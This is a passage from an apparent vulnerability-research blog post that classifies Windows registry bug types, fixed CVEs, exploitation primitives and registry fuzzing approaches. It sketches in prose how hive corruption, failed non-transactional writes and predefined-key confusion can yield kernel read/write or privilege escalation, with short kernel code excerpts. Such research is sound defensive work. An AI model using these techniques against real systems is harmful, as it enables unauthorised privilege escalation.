(e.g., administrators only). Additionally, when assigning custom security descriptors to keys in global system hives, you should exercise caution to avoid inadvertently granting write permissions to all system users. Furthermore, if a user has KEY_CREATE_LINK access to a global key used by higher-privileged processes, they can create a symbolic link within it, potentially resulting in a "confused deputy" problem and the ability to create registry keys under any path. In summary, for developers creating high-privilege code on Windows and utilizing the registry, it is essential to carefully handle the security descriptors of the keys they create and operate on. From a security researcher's perspective, it could be useful to develop tooling to list all keys that allow specific access types to particular groups in the system and run it periodically on different Windows versions and configurations. This approach can lead to some very easy bug discoveries, as it doesn't require any time spent on reverse engineering or code auditing. The second type of issue is more subtle and arises because a single "configuration unit" in the registry sometimes consists of multiple elements (keys, values) and must be modified atomically to prevent an inconsistent state and potential vulnerabilities.  For such cases, there is support for transactions in the registry. If a given process manages a configuration that is critical to system security and in which different elements must always be consistent with each other, then making use of the Transacted Registry (TxR) is practically mandatory. A significantly worse, though somewhat acceptable solution may be to implement a custom rollback logic, i.e., in the event of a failure of some individual operation, manually reversing the changes that have been applied so far. The worst case scenario is when a privileged program does not realize the seriousness of introducing partial changes to the registry, and implements its logic in a way typical of using the API in a best-effort manner, i.e.: calling Win32 functions as long as they succeed, and when any of them returns an error, then simply passing it up to the caller without any additional cleanup. Let's consider this bug class on the example of a hypothetical service that, through some local inter-process communication interface, allows users to register applications for startup. It creates a key structure under the HKLM\Software\CustomAutostart\ path, and for each such key it stores two values: the command line to run during system startup ("CommandLine"), and the username with whose privileges to run it ("UserName"). If the username value does not exist, it implicitly assumes that the program should start with system rights. Of course, the example service intends to be secure, so it only allows setting the username to the one corresponding to the security token of the requesting process. Operations on the registry take place in the following order: Create a new key named HKLM\Software\CustomAutostart\,Set the "CommandLine" value to the string provided by the client,Set the "UserName" value to the string provided by the client. The issue with this logic is that it's not transactional – if an error occurs, the execution simply aborts, leaving the partial state behind. For example, if operation #3 fails for any reason, an entry will be added to the autostart indicating that a controlled path should be launched with system rights. This directly leads to privilege escalation and was certainly not the developer's intention. One might wonder why any of these operations would fail, especially in a way controlled by an attacker. The answer is simple and was explained in the "Susceptibility to mishandling OOM conditions" section. A local attacker has at least two ways of influencing the success or failure of registry operations in the system: by filling the space of the hive they want to attack (if they have write access to at least one of its keys) or by occupying the global registry quota in memory, represented by the global nt!CmpGlobalQuota variable. Unfortunately, finding such vulnerabilities is more complicated than simply scanning the entire registry for overly permissive security descriptors. It requires identifying candidates of registry operations in the system that have appropriate characteristics (high privilege process, lack of transactionality, sensitivity to a partial/incomplete state), and then potentially reverse-engineering the specific software to get a deeper understanding of how it interacts with the registry. Tools like Process Monitor may come in handy at least in the first part of the process. One example of a vulnerability related to the incorrect guarantee of atomicity of system-critical structures is CVE-2024-26181. As a result of exhausting the global registry quota, it could lead to permanent damage to the HKLM\SAM hive, which stores particularly important information about users in the system, their passwords, group memberships, etc.Vulnerability primitives In this chapter, we will focus on classifying registry vulnerabilities based on the primitives they offer, and briefly discuss their practical consequences and potential exploitation methods.Pool memory corruption Pool memory corruption is probably the most common type of low-level vulnerability in the Windows kernel. In the context of the registry, this bug class is somewhat rarer than in other ring-0 components, but it certainly still occurs and is entirely possible. It manifests in its most "pure" form when the corruption happens within an auxiliary object that is temporarily allocated on the pools to implement a specific operation. One such example case is a report concerning three vulnerabilities—CVE-2022-37990, CVE-2022-38038, and CVE-2022-38039—all stemming from a fairly classic 16-bit integer overflow when calculating the length of a dynamically allocated buffer. Another example is CVE-2023-38154, where the cause of the buffer overflow was slightly more intricate and originated from a lack of error handling in one of the functions responsible for recovering the hive state from LOG files. The second type of pool memory corruption that can occur in the registry is problems managing long-lived objects that are used to cache some information from the hive mapping in more readily accessible pool memory — such as those described in post #6. In this case, we are usually dealing with UAF-type conditions, like releasing an object while there are still some active references to it. If I had to point to one object that could be most prone to this type of bug, it would probably be the Key Control Block, which is reference counted, used by the implementation of almost every registry syscall, and for which there are some very strong invariants critical for memory safety (e.g., the existence of only one KCB for a particular key in the global KCB tree). One issue related to KCBs was CVE-2022-44683, which resulted from incorrect handling of predefined keys in the NtNotifyChangeMultipleKeys system call. Another, slightly different category of UAFs on pools are situations in which this type of condition is not a direct consequence of a vulnerability, but more of a side effect. Let's take security descriptors as an example: they are located in the hive space, but the kernel also maintains a cache reflecting the state of these descriptors on the kernel pools (in _CMHIVE.SecurityCache and related fields). Therefore, if for some reason a security descriptor in the hive is freed prematurely, this problem will also be automatically reflected in the cache, and some keys may start to have a dangling KCB.CachedSecurity pointer set to the released object. I have taken advantage of this fact many times in my reports to Microsoft, because it was very useful for reliably triggering crashes. While generating a bugcheck based on the UAF of the _CM_KEY_SECURITY structure in the hive is possible, it is much more convoluted than simply turning on the Special Pool mechanism and making the kernel refer to the cached copy of the security descriptor (a few examples: CVE-2023-23421, CVE-2023-35382, CVE-2023-38139). In some cases, exploiting memory corruption on pools may also offer some advantages over exploiting hive-based memory corruption, so it is definitely worth remembering this behavior for the future. When it comes to the strictly technical aspects of kernel pool exploitation, I won't delve into it too deeply here. I didn't specifically focus on it in my research, and there aren't many interesting registry-specific details to mention in this context. If you are interested to learn more about this topic, please refer to the resources available online.Hive memory corruption The second type of memory corruption encountered in the registry is hive-based memory corruption. This class of bugs is unique to the registry and is based on the fact that data stored in hives serves a dual role. It stores information persistently on disk, but it also works as the representation of the hive in memory in the exact same form. The data is then operated on using C code through pointers, helper functions like memcpy, and so on. Given all this, it doesn't come as a surprise that classic vulnerabilities such as buffer overflows or use-after-free can also occur within this region. So far, during my research, I have managed to find 17 hive-based memory corruption issues, which constitutes approximately 32% of all 53 vulnerabilities that have been fixed by Microsoft in security bulletins. The vast majority of them were related to just two mechanisms – reference counting security descriptors and operating on subkey lists – but there were also cases of bugs related to other types of objects. I have started using the term "inconsistent hive state", referring to any situation where the regf format state either ceases to be internally consistent or stops accurately reflecting cached copies of the same data within other kernel objects. I described one such issue here, where the _CM_BIG_DATA.Count field stops correctly corresponding to the _CM_KEY_VALUE.DataLength field for the same registry value. However, despite this specific behavior being incorrect, according to both my analysis and Microsoft's, it doesn't have any security implications for the system. In this context, the term "hive-based memory corruption" denotes a slightly narrower group of issues that not only allow reaching any inconsistent state but specifically enable overwriting valid regf structures with attacker-controlled data. The general scheme for exploiting hive-based memory corruption closely resembles the typical exploitation of any other memory corruption. The attacker's initial objective is to leverage the available primitive and manipulate memory allocations/deallocations to overwrite a specific object in a controlled manner. On modern systems, achieving this stage reliably within the heap or kernel pools can be challenging due to allocator randomization and enforced consistency checks. However, the cell allocator implemented by the Windows kernel is highly favorable for the attacker: it lacks any safeguards, and its behavior is entirely deterministic, which greatly simplifies this stage of exploit development. One could even argue that, given the properties of this allocator, virtually any memory corruption primitive within the regf format can be transformed into complete control of the hive in memory with some effort. With this assumption, let's consider what to do next. Even if we have absolute control over all the internal data of the mapped hive, we are still limited to its mapping in memory, which in itself does not give us much. The question arises as to how we can "escape" from this memory region and use hive memory corruption to overwrite something more interesting, like an arbitrary address in kernel memory (e.g., the security token of our process). First of all, it is worth noting that such an escape is not always necessary – if the attack is carried out in one of the system hives (SOFTWARE, SYSTEM, etc.), we may not need to corrupt the kernel memory at all. In this case, we could simply perform a data-only attack and modify some system configuration, grant ourselves access to important system keys, etc. However, with many bugs, attacking a highly privileged hive is not possible. Then, the other option available to the attacker is to modify one of the cells to break some invariant of the regf format, and cause a second-order side effect in the form of a kernel pool corruption. Some random ideas are:Setting too long a key name or inserting the illegal character '\' into the name,Creating a fake exit node key,Corrupting the binary structure of a security descriptor so that the internal APIs operating on them start misbehaving,Crafting a tree structure within the hive with a depth greater than the maximum allowed (512 levels of nesting),... and many, many others. However, during experiments exploring practical exploitation, I discovered an even better method that grants an attacker the ability to perform reliable arbitrary read and write operations in kernel memory—the ultimate primitive. This method exploits the behavior of 32-bit cell index values, which exhibit unusual behavior when they exceed the hive's total size. I won't elaborate on the full technique here, but for those interested, I discussed it during my presentation at the OffensiveCon conference in May 2024. The subject of exploiting hive memory corruption will be also covered in detail in its own dedicated blog post in the future.Invalid cell indexes This is a class of bugs that manifests directly when an incorrect cell index appears in an object—either in a cell within the hive or in a structure on kernel pools, like KCB. These issues can be divided into three subgroups, depending on the degree of control an attacker can gain over the cell index.Cell index 0xFFFFFFFF (HCELL_NIL) This is a special marker that indicates that a given structure member/variable of type HCELL_INDEX doesn't point to any specific cell, which is equivalent to a NULL pointer in C. There are many situations where the value 0xFFFFFFFF (in other words, -1) is used and even desired, e.g. to signal that an optional object doesn't exist and shouldn't be processed. The kernel code is prepared for such cases and correctly checks whether a given cell index is equal to this marker before operating on it. However, problems can arise when the value ends up in a place where the kernel always expects a valid index. Any mandatory field in a specific object can be potentially subject to this problem, such as the _CM_KEY_NODE.Security field, which must always point to a valid descriptor and should never be equal to -1 (other than for exit nodes). Some examples of such vulnerabilities include:CVE-2023-21772: an unexpected value of -1 being set in _CM_KEY_NODE.Security due to faulty logic in the registry virtualization code, which first freed the old descriptor and only then attempted to allocate a new one, which could fail, leaving the key without any assigned security descriptor.CVE-2023-35357: an unexpected value of -1 being set in KCB.KeyCell, because the code assumed that it was operating on a physically existing base key, while in practice it could operate on a layered key with Merge-Unbacked semantics, which does not have its own key node, but relies solely on key nodes at lower levels of the key stack.CVE-2023-35358: another case of an unexpected value of -1 being set in KCB.KeyCell, while the kernel expected that at least one key in the given key node stack would have an allocated key node object. The source of the problem here was incorrect integration of transactions and differencing hives. When such a problem occurs, it always manifests by the value -1 being passed as the cell index to the HvpGetCellPaged function. For decades, this function completely trusted its parameters, assuming that the input cell index would always be within the bounds of the given hive. Consequently, calling HvpGetCellPaged with a cell index of 0xFFFFFFFF would result in the execution of the following code: _CELL_DATA *HvpGetCellPaged(_HHIVE *Hive, HCELL_INDEX Index) {   _HMAP_ENTRY *Entry = &Hive->Storage[1].Map->Directory[0x3FF]->Table[0x1FF];   return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + 0xFFF + 4; } In other words, the function would refer to the Volatile (1) map cell, and within it, to the last element of the Directory and then the Table arrays. Considering the "small dir" optimization described in post #6, it becomes clear that this cell map walk could result in an out-of-bounds memory access within the kernel pools (beyond the boundaries of the _CMHIVE structure). Personally, I haven't tried to transform this primitive into anything more useful, but it seems evident that with some control over the kernel memory around _CMHIVE, it should theoretically be possible to get the HvpGetCellPaged function to return any address chosen by the attacker. Further exploitation prospects would largely depend on the subsequent operations that would be performed on such a fake cell, and the extent to which a local user could influence them. In summary, I've always considered these types of bugs as "exploitable on paper, but quite difficult to exploit in practice." Ultimately, none of this matters much, because it seems that Microsoft noticed a trend in these vulnerabilities and, in July 2023, added a special condition to the HvpGetCellFlat and HvpGetCellPaged functions:   if (Index == HCELL_NIL) {     KeBugCheckEx(REGISTRY_ERROR, 0x32, 1, Hive, 0xFFFFFFFF);  } This basically means that the specific case of index -1 has been completely mitigated, since rather than allowing any chance of exploitation, the system now immediately shuts down with a Blue Screen of Death. As a result, the bug class no longer has any security implications. However, I do feel a bit disappointed – if Microsoft deemed the check sufficiently important to add to the code, they could have made it just a tiny bit stronger, for example:   if ((Index & 0x7FFFFFFF) >= Hive->Storage[Index >> 31].Length) {     KeBugCheckEx(...);   } The above check would reject all cell indexes exceeding the length of the corresponding storage type, and it is exactly what the HvpReleaseCellPaged function currently does. Checking this slightly stronger condition in one fell swoop would handle invalid indexes of -1 and completely mitigate the previously mentioned technique of out-of-bounds cell indexes. While not introduced yet, I still secretly hope that it will happen one day... 🙂Dangling (out-of-date) cell indexes Another group of vulnerabilities related to cell indexes are cases where, after a cell is freed, its index remains in an active cell within the registry. Simply put, these are just the cell-specific use-after-free conditions, and so the category very closely overlaps with the previously described hive-based memory corruption. Notable examples of such bugs include:CVE-2022-37988: Caused by the internal HvReallocateCell function potentially failing when shrinking an existing cell, which its caller assumed was impossible.CVE-2023-23420: A bug in the transactional key rename operation could lead to a dangling cell index in a key's subkey list, pointing to a freed key node.CVE-2024-26182: Caused by mishandling a partial success situation where an internal function might successfully perform some operations on the hive (reallocate existing subkey lists) but ultimately return an error code, causing the caller to skip updating the _CM_KEY_NODE.SubKeyLists[...] field accordingly.All use-after-free vulnerabilities in security descriptors due to incorrect reference counting: CVE-2022-34707, CVE-2023-28248, CVE-2023-35356, CVE-2023-35382, CVE-2023-38139, and CVE-2024-43641. In general, UAF bugs within the hive are powerful primitives that can typically be exploited to achieve total control over the hive's internal data. The fact that both exploits I wrote to demonstrate practical exploitation of hive memory corruption vulnerabilities fall into this category (CVE-2022-34707, CVE-2023-23420) can serve as anecdotal evidence of this statement.Fully controlled/arbitrary cell indexes The last type of issues where cell indexes play a major role are situations in which the user somehow obtains full control over the entire 32-bit index value, which is then referenced as a valid cell by the kernel. Notably, this is not about some second-order effect of hive memory corruption, but vulnerabilities where this primitive is the root cause of the problem. Such situations happen relatively rarely, but there have been at least two such cases in the past: CVE-2022-34708: missing verification of the _CM_KEY_SECURITY.Blink field in the CmpValidateHiveSecurityDescriptors function for the root security descriptor in the hive,CVE-2023-35356: referencing the _CM_KEY_NODE.ValueList.List field in a predefined key, in which the ValueList structure has completely different semantics, and its List field can be set to an arbitrary value. Given that the correctness of cell indexes is a fairly obvious requirement known to Microsoft kernel developers, they pay close attention to verifying them thoroughly. For this reason, I think that the chance we will have many more such bugs in the future is slim. As for their exploitation, they may seem similar in nature to the way hive memory corruption can be exploited with out-of-bounds cell indexes, but in fact, these are two different scenarios. With hive-based memory corruption, we can dynamically change the value of a cell index multiple times as needed, and here, we would only have one specific 32-bit value at our disposal. If, in a hypothetical vulnerability, some interesting operations were performed on such a controlled index, I would probably still reduce the problem to the typical UAF case, try to obtain full binary control over the hive, and continue from there.Low-level information disclosure (memory, pointers) Since the registry code is written in C and operates with kernel privileges, and additionally has not yet been completely rewritten to use zeroing ExAllocatePool functions, it is natural that it may be vulnerable to memory disclosure issues when copying output data to user-mode. The most canonical example of such a bug was CVE-2023-38140, where the VrpPostEnumerateKey function (one of the sub-handlers of the VRegDriver registry callback) allocated a buffer on kernel pools with a user-controlled length, filled it with some amount of data – potentially less than the buffer size – and then copied the entire buffer back to user mode, including uninitialized bytes at the end of the allocation. However, besides this typical memory disclosure scenario, it is worth noting two more things in the context of the registry. One of them is that, as we know, the registry operates not only on memory but also on various files on disk, and therefore the filesystem becomes another type of data sink where data leakage can also occur. And so, for example, in CVE-2022-35768, kernel pool memory could be disclosed directly to the hive file due to an out-of-bounds read vulnerability, and in CVE-2023-28271, both uninitialized data and various kernel-mode pointers were leaked to KTM transaction log files. The second interesting observation is that the registry implementation does not have to be solely the source of the data leak, but can also be just a medium through which it happens. There is a certain group of keys and values that are readable by ordinary users and initialized with binary data by the kernel and drivers using ZwSetValueKey and similar functions. Therefore, there is a risk that some uninitialized data may leak through this channel, and indeed during my Bochspwn Reloaded research in 2018, I identified several instances of such leaks, such as CVE-2018-0898, CVE-2018-0899, and CVE-2018-0900.Broken security guarantees, API contracts and common sense assumptions Besides maintaining internal consistency and being free of low-level bugs, it's also important that the registry behaves logically and predictably, even under unusual conditions. It must adhere to the overall security model of Windows NT, operate in accordance with its public documentation, and behave in a way that aligns with common sense expectations. Failure to do so could result in various problems in the client software that interacts with it, but identifying such deviations from expected behavior can be challenging, as it requires deep understanding of the interface's high-level principles and the practical implications of violating them. In the following subsections, I will discuss a few examples of issues where the registry's behavior was inconsistent with documentation, system architecture, or common sense.Security access rights enforcement The registry implementation must enforce security checks, meaning it must verify appropriate access rights to a key when opening it, and then again when performing specific operations on the obtained handle. Generally, the registry manages this well in most cases. However, there were two bugs in the past that allowed a local user to perform certain operations that they theoretically didn't have sufficient permissions for: CVE-2023-21750: Due to a logic bug in the CmKeyBodyRemapToVirtual function (related to registry virtualization), it was possible to delete certain keys within the HKLM\Software hive with only KEY_READ and KEY_SET_VALUE rights, without the normally required DELETE right.CVE-2023-36404: In this case, it was possible to gain access to the values of certain registry keys despite lacking appropriate rights. The attack itself was complex and required specific circumstances: loading a differencing hive overlaid on a system hive with a specially crafted key structure, and then having a system component create a secret key in that system hive. Because of the fact that the handle to the layered key would be opened earlier (and the security access check would be performed at that point in time), creating a new key at a lower level with more restricted permissions wouldn't be considered later, leading to potential information disclosure. As shown, both these bugs were directly related to incorrect or missing permissions verification, but they weren't particularly attractive in terms of practical attacks. A much more appealing bug was CVE-2019-0881, discovered in registry virtualization a few years earlier by James Forshaw. That vulnerability allowed unprivileged users to read every registry value in the system regardless of the user's privileges, which is about as powerful as a registry infoleak can get.Confused deputy problems with predefined keys Predefined keys probably don't need any further introduction at this point in the series. In this specific case of the confused deputy problem, the bug report for CVE-2023-35633 captures the essence of the issue well: if a local attacker had binary control over a hive, they could cause the use of an API like RegOpenKeyExW on any key within that hive to return one of the predefined pseudo-handles like HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER, etc., instead of a normal handle to that key. This behavior was undocumented and unexpected for developers using registry in their code. Unsurprisingly, finding a privileged process that did something interesting on a user-controlled hive wasn't that hard, and it turned out that there was indeed a service in Windows that opened a key inside the HKCU of each logged-in user, and recursively set permissive access rights on that key. By abusing predefined handles, it was possible to redirect the operation and grant ourselves full access to one of the global keys in the system, leading to a fairly straightforward privilege escalation. If you are interested in learning more about the bug and its practical exploitation, please refer to my Windows Registry Deja Vu: The Return of Confused Deputies presentation from CONFidence 2024. In many ways, this attack was a resurrection of a similar confused deputy problem, CVE-2010-0237, which I had discovered together with Gynvael Coldwind. The main difference was that at that time, the redirection of access to keys was achieved via symbolic links, a more obvious and widely known mechanism.Atomicity of KTM transactions The main feature of any transaction implementation is that it should guarantee atomicity – that is, either apply all changes being part of the transaction, or none of them. Imagine my surprise then, when I discovered that the registry transaction implementation integrated with the KTM did not guarantee atomicity at all, but merely tried really hard to maintain it. The main problem was that it wasn't designed to handle OOM errors (for example, when a hive was completely full) and, as a result, when such a problem occurred in the middle of committing a transaction, there was no good way to reverse the changes already applied. The Configuration Manager falsely returned a success code to the caller, while retrying to commit the remaining part of the transaction every 30 seconds, hoping that some space would free up in the registry in the meantime, and the operations would eventually succeed. This type of behavior obviously contradicted both the documentation and common sense about how transactions should work. I reported this issue as CVE-2023-32019, and Microsoft fixed it by completely removing a large part of the code that implemented this functionality, as it was simply impossible to fix correctly without completely redesigning it from scratch. Fortunately, in Windows 10, an alternative transaction implementation for the registry called lightweight transactions was introduced, which was designed correctly and did not have the same problem. As a result, a decision was made to internally redirect the handling of KTM transactions within the Windows kernel to the same engine that is responsible for lightweight transactions.Containerized registry escapes The general goal of differencing hives and layered keys is to implement registry containerization. This mechanism creates an isolated registry view for a specific group of processes, without direct access to the host registry (a sort of "chroot" for the Windows registry). Unfortunately, there isn't much official documentation on this topic, and it's particularly difficult to find information on whether this type of containerization is a Microsoft-supported security boundary that warrants fixes in the monthly security bulletins. I think it is reasonable to expect that since the mechanism is used to isolate the registry in well supported use-cases (such as running Docker containers), it should ideally not be trivial to bypass, but I was unable to find any official statement to support or refute this assumption. When I looked further into it, I discovered that the redirection of registry calls within containerized environments was managed by registry callbacks, specifically one called VrpRegistryCallback. While callbacks do indeed seem well suited for this purpose, the devil is in the details – specifically, error handling. I found at least two ways a containerized application could trigger an error during the execution of the internal VrpPreOpenOrCreate/VrpPostOpenOrCreate handlers. This resulted in exiting the callback prematurely while an important part of the redirection logic still hadn't been executed, and consequently led to the process gaining access to the host's registry view. Additionally, I found that another logical bug allowed access to the host's registry through differencing hives associated with other active containers in the system. As I mentioned, I wasn't entirely clear on the state of Microsoft's support for this mechanism, but luckily I didn't have to wonder for too long. It turned out that James Forshaw had a similar dilemma and managed to reach an understanding with the vendor on the matter, which he described in his blog post. After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable. [...] Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege. Eventually, I reported all three bugs in one report, and Microsoft fixed them shortly after as CVE-2023-36576. I particularly like the first issue described in the report (the bug in VrpBuildKeyPath), as it makes a very interesting example of how a theoretically low-level issue like a 16-bit integer overflow can have the high-level consequences of a container escape, without any memory corruption being involved.Adherence to official key and value name length limits The constraints on the length of key and value names are quite simple. Microsoft defines the maximum values on a dedicated documentation page called Registry Element Size Limits: Registry element Size limit Key name 255 characters. The key name includes the absolute path of the key in the registry, always starting at a base key, for example, HKEY_LOCAL_MACHINE. Value name 16,383 characters. Windows 2000: 260 ANSI characters or 16,383 Unicode characters. Admittedly, the way this is worded is quite confusing, and I think it would be better if the information in the second column simply ended after the first period. As it stands, the explanation for "key name" seems to suggest that the 255-character limit applies to the entire key path relative to the top-level key. In reality, the limit of 255 (or to be precise, 256) characters applies to the individual name of each registry key, and value names are indeed limited to 16,383 characters. These assumptions are the basis for the entire registry code. Despite these being fundamental and documented values, it might be surprising that the requirements weren't correctly verified in the hive loading code until October 2022. Specifically, it was possible to load a hive containing a key with a name of up to 1040 characters. Furthermore, the length of a value's name wasn't checked at all, meaning it could consist of up to 65535 characters, which is the maximum value of the uint16 type representing its length. In both cases, it was possible to exceed the theoretical limits set by the documentation by more than four times. I reported these bugs as part of the CVE-2022-37991 report. On a default Windows installation, I found a way to potentially exploit (or at least trigger a reproducible crash) the missing check for the value name length, but I couldn't demonstrate the consequences of an overly long key name. Nevertheless, I'm convinced that with a bit more research, one could find an application or driver implementing a registry callback that assumes key names cannot be longer than 255 characters, leading to a buffer overflow or other memory corruption. This example clearly shows that even the official documentation cannot be trusted, and all assumptions, even the most fundamental ones, must be verified directly in the code during vulnerability research.Creation of stable keys under volatile ones Another rational behavior of the registry is that it doesn't allow you to create Stable keys under Volatile parent keys. This makes sense, as stable keys are stored on disk and persist through hive unload and system reboot, whereas volatile keys only exist in memory and vanish when the hive is unloaded. Consequently, a stable key under a volatile one wouldn't be practical, as its parent would disappear after a restart, severing its path to the registry tree root, causing the stable key to disappear as well. Therefore, under normal conditions, creating such a key is impossible, and any attempts to do so results in the  ERROR_CHILD_MUST_BE_VOLATILE error being returned to the caller. While there's no official mention of this in the documentation (except for a brief description of the error code), Raymond Chen addressed it on his blog, providing at least some documentation of this behavior. During my research, I discovered two ways to bypass this requirement and create stable keys under volatile ones. These were issues CVE-2023-21748 and CVE-2024-26173, where the first one was related to registry virtualization, and the second to transaction support. Interestingly, in both of these cases, it was clear that a certain invariant in the registry design was being broken, but it was less clear whether this could have any real consequences for system security. After spending some time on analysis, I came to the conclusion that there was at least a theoretical chance of some security impact, due to the fact that security descriptors of volatile keys are not linked together into a global linked list in the same way stable security descriptors are. Long story short, if later in time some other stable keys in the hive started to share the security descriptor of the stable-under-volatile one, then their security would become invalidated and forcibly reset to their parent's descriptor on the next system reboot, violating the security model of the registry. Microsoft apparently shared my assessment of the situation, as they decided to fix both bugs as part of a security bulletin. Still, this is an interesting illustration of the complexity of the registry – sometimes finding an anomaly in the kernel logic can generate some kind of inconsistent state, but its implications might not be clear without further, detailed analysis.Arbitrary key existence information leak If someone were to ask me whether an unprivileged user should be able to check for the existence of a registry key without having any access rights to that key or its parent in a secure operating system, I would say absolutely not. However, this is possible on Windows, because the code responsible for opening keys first performs a full path lookup, and only then checks the access rights. This allows for differentiation between existing keys (return value STATUS_ACCESS_DENIED) and non-existing keys (return value STATUS_OBJECT_NAME_NOT_FOUND). After discovering this behavior, I decided to report it to Microsoft in December 2023. The vendor's response was that it is indeed a bug, but its severity is not high enough to be fixed as an official vulnerability. I somewhat understand this interpretation, as the amount of information that can be disclosed in this way is quite low (i.e. limited configuration elements of other users), and fixing the issue would probably involve significant code refactoring and a potential performance decrease.  It's also difficult to say whether this type of boundary is properly defensible, because after one fix it might turn out that there are many other ways to leak this type of information. Therefore, the technique described in my report still works at the time of writing this blog post.Miscellaneous In addition to the bug classes mentioned above, there are also many other types of issues that can occur in the registry. I certainly won't be able to name them all, but briefly, here are a few more primitives that come to mind when I think about registry vulnerabilities:Low-severity security bugs: These include local DoS issues such as NULL pointer dereferences, infinite loops, direct KeBugCheckEx calls, as well as classic memory leaks, low-quality out-of-bounds reads, and others. The details of a number of such bugs can be found in the p0tools/WinRegLowSeverityBugs repository on GitHub.Real, but unexploitable bugs: These are bugs that are present in the code, but cannot be exploited due to some mitigating factors. Examples include bugs in the CmpComputeComponentHashes and HvCheckBin internal functions.Memory management bugs: These bugs are specifically related to the management of hive section views in the context of the Registry process. This especially applies to situations where the hive is loaded from a file on a removable drive, from a remote SMB share, or from a file on a local disk but with unusual semantics (e.g., a placeholder file created through the Cloud Filter API). Two examples of this vulnerability type are CVE-2024-43452 and CVE-2024-49114.Unusual primitives: These are various non standard primitives that are simply too difficult to categorize, such as CVE-2024-26177, CVE-2024-26178, WinRegLowSeverityBugs #19, or WinRegLowSeverityBugs #20.Fuzzing considerations Due to the Windows Registry's strictly defined format (regf) and interface (around a dozen specific syscalls that operate on it), automated testing in the form of fuzzing is certainly possible. We are dealing with kernel code here, so it's not as simple as taking any library that parses a file format and connecting it to a standard fuzzer like AFL++, Honggfuzz, or Jackalope – registry fuzzing requires a bit more work. But, in its simplest form, it could consist of just a few trivial steps: finding an existing regf file, writing a bit-flipping mutator, writing a short harness that loads the hive using RegLoadAppKey, and then running those two programs in an infinite loop and waiting for the system to crash. It's hard to argue that this isn't some form of fuzzing, and in many cases, these kinds of methods are perfectly sufficient for finding plenty of serious vulnerabilities. After all, my entire months-long research project started with this fairly primitive fuzzing, which did more or less what I described above, with just a few additional improvements:Fixing the hash in the regf header,Performing a few simple operations on the hive, like enumerating subkeys and values,Running on multiple machines at once,Collecting code coverage information from the Windows kernel. Despite my best efforts, this type of fuzzing was only able to find one vulnerability (CVE-2022-35768), compared to over 50 that I later discovered manually by analyzing the Windows kernel code myself. This ratio doesn't speak well for fuzzing, and it stems from the fact that the registry isn't as simple a target for automated testing as it might seem. On the contrary, each individual element of such fuzzing is quite difficult and requires a large time investment if one wishes to do it effectively. In the following sections, I'll focus on each of these components (corpus, mutator, harness and bug detection), pointing out what I think could be improved in them compared to the most basic version discussed above.Initial corpus The first issue a potential researcher may encounter is gathering an initial corpus of input files. Sure, one can typically find dozens of regf files even on a clean Windows installation, but the problem is that they are all very simple and don't exhibit characteristics interesting from a fuzzing perspective. In particular:All of these hives are generated by the same registry implementation, which means that their state is limited to the set of states produced by Windows, and not the wider set of states accepted by the hive loader.The data structures within them are practically never even close to the limits imposed by the format itself, for example:The maximum length of key and value names are 256 and 16,383 characters, but most names in standard hives are shorter than 30 characters.The maximum nesting depth of the tree is 512 levels, but in most hives, the nesting doesn't exceed 10 levels.The maximum number of keys and values in a hive is limited only by the maximum space of 2 GiB, but standard hives usually include at most a few subkeys and associated values – certainly not the quantities that could trigger any real bugs in the code. This means that gathering a good initial corpus of hives is very difficult, especially considering that there aren't many interesting regf hives available on the Internet, either. The other options are as follows: either simply accept the poor starting corpus and hope that these shortcomings will be made up for by a good mutator (see next section), especially if combined with coverage-based fuzzing, or try to generate a better one yourself by writing a generator based on one of the existing interfaces (the kernel registry implementation, the user-mode Offline Registry Library, or some other open-source library). As a last resort, you could also write your own regf file generator from scratch, where you would have full control over every aspect of the format and could introduce any variance at any level of abstraction. The last approach is certainly the most ambitious and time-consuming, but could potentially yield the best results.Mutator Overall, the issue with the mutator is very similar to the issue with the initial corpus. In both cases, the goal is to generate the most "interesting" regf files possible, according to some metric. However, in this case, we can no longer ignore the problem and hope for the best. If the mutator doesn't introduce any high-quality changes to the input file, nothing else will. There is no way around it – we have to figure out how to make our mutator test as much state of the registry implementation as possible. For simplicity, let's assume the simplest possible mutator that randomly selects N bits in the input data and flips them, and/or selects some M bytes and replaces them with other random values. Let's consider for a moment what logical types of changes this approach can introduce to the hive structure:Enable or disable some flags, e.g., in the _CM_KEY_NODE.Flags field,Change the value of a field indicating the length of an array or list, e.g., _CM_KEY_NODE.NameLength, _CM_KEY_VALUE.DataLength, or a 32-bit field indicating the size of a given cell,Slightly change the name of a key or value, or the data in the backing cell of a value,Corrupt a value sanitized during hive loading, causing the object to be removed from the hive during the self-healing process,Change the value of some cell index, usually to an incorrect value,Change/corrupt the binary representation of a security descriptor in some way. This may seem like a broad range of changes, but in fact, each of them is very local and uncoordinated with other modifications in the file. This can be compared to binary mutation of an XML file – sometimes we may corrupt/remove some critical tag or attribute, or even change some textually encoded number to another valid number – but in general, we should not expect any interesting structural changes to occur, such as changing the order of objects, adding/removing objects, duplicating objects, etc. Hives are very similar in nature. For example, it is possible to set the KEY_SYM_LINK flag in a key node by pure chance, but for this key to actually become a valid symlink, it is also necessary to remove all its current values, ​​and add a new value named "SymbolicLinkValue" of type REG_LINK containing a fully qualified registry path. With a mutator operating on single bits and bytes, the probability of this happening is effectively zero. In my opinion, a dedicated regf mutator would need to operate simultaneously on four levels of abstraction, in order to be able to create the conditions necessary for triggering most bugs:On the high-level structure of a hive, where only logical objects matter: keys, values, security descriptors, and the relationships between them. Mutations could involve adding, removing, copying, moving, and changing the internal properties of these three main object types. These mutations should generally conform to the regf format, but sometimes push the boundaries by testing edge cases like handling long names, a large number of subkeys or values, or a deeply nested tree.On the level of specific cell types, which can represent the same information in many different ways. This primarily refers to all kinds of lists that connect higher-level objects, particularly subkey lists (index leaves, fast leaves, hash leaves, root indexes), value lists, and linked lists of security descriptors. Where permitted by the format (or sometimes even in violation of the format), the internal representation of these lists could be changed, and its elements could be rearranged or duplicated.On the level of cell and bin layout: taking the entire set of interconnected cells as input, they could be rearranged in different orders, in bins of different sizes, sometimes interspersed with empty (or artificially allocated) cells or bins. This could be used to find vulnerabilities specifically related to hive memory management, and also to potentially facilitate triggering/reproducing hive memory corruption issues more reliably.On the level of bits and bytes: although this technique is not very effective on its own, it can complement more intelligent mutations. You never know what additional problems can be revealed 